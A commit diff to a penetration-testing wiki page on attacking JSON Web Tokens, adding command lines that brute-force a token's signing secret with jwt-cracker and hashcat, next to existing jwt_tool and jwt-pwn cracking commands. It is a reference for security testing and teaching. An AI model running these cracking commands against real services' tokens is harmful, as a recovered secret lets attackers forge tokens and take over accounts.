GitBook: [master] one page modified

carlospolop · gitbook-bot · commit 8f8eb9fed1bb · 2021-03-08T16:02:22.000Z
diff --git a/pentesting-web/hacking-jwt-json-web-tokens.md b/pentesting-web/hacking-jwt-json-web-tokens.md
@@ -62,6 +62,12 @@ python3 jwt_tool.py -d wordlists.txt <JWT token>
 
 #https://github.com/mazen160/jwt-pwn
 python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
+
+#https://github.com/lmammino/jwt-cracker
+jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
+
+#hashcat
+hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
 ```
 
 ## Modify the algorithm to None \(CVE-2015-9235\)
